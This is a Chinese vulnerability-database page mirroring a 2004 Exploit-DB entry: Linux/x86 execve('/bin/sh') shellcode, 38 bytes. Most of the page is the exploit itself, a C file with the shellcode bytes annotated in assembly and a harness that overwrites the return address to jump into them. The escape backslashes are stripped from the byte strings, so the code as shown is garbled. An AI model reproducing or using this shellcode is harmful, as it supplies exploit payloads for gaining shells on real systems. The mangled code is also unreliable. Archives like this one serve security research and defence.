Linux/x86 – execve(/bin/sh) Shellcode (38 bytes)-安全小百科

Linux/x86 – execve(/bin/sh) Shellcode (38 bytes)

漏洞ID	1054611	漏洞类型
发布时间	2004-09-12	更新时间	2004-09-12
CVE编号	N/A	CNNVD-ID	N/A
漏洞平台	Linux_x86	CVSS评分	N/A

|漏洞来源

https://www.exploit-db.com/exploits/13445

|漏洞详情

漏洞细节尚未披露

|漏洞EXP

/*
 * s0t4ipv6@Shellcode.com.ar
 * execve /bin/sh
 *
 * main() {
 *  char *name[2];
 *  name[0]="/bin/sh";
 *  name[1]=NULL;
 *  execve(name[0],name,NULL);
 * }
*/

#include <stdio.h>

char shellcode[]=
"xebx18"		//	jmp	0x18		// 3-4
"x5e"			//	popl	%esi		// 5
"x89x76x08"		//	movl	%esi, 0x8(%esi)	// 6-8
"x31xc0"		//	xorl	%eax, %eax	// 9-10
"x88x46x07"		//	movb	%al, 0x7(%esi)  // 11-13
"x89x46x0c"		//	movl	%eax, 0xc(%esi)	// 14-16  
"x89xf3"		//	movl	%esi, %ebx	// 17-18
"x8dx4ex08"		//	leal	0x8(%esi), %ecx	// 19-21
"x8dx56x0c"		//	leal	0xc(%esi), %edx	// 22-24
"xb0x0b"		//	movb	$0xb, %al	// 25-20 0xb to eax (syscall execve)6
"xcdx80"		//	int	$0x80		// 27-28
"xe8xe3xffxffxff"	//	call	-0x1d
"/bin/sh";

main() {
	int *ret;
	ret=(int *)&ret +2;
	printf("Shellcode lenght=%dn",strlen(shellcode));
	(*ret) = (int)shellcode;
}

// milw0rm.com [2004-09-12]

相关推荐: Typo3 Showpic.PHP File Enumeration Vulnerability

Typo3 Showpic.PHP File Enumeration Vulnerability 漏洞ID 1100763 漏洞类型 Design Error 发布时间 2003-02-28 更新时间 2003-02-28 CVE编号 N/A CNNVD-ID…

文章版权归作者所有，未经允许请勿转载。

THE END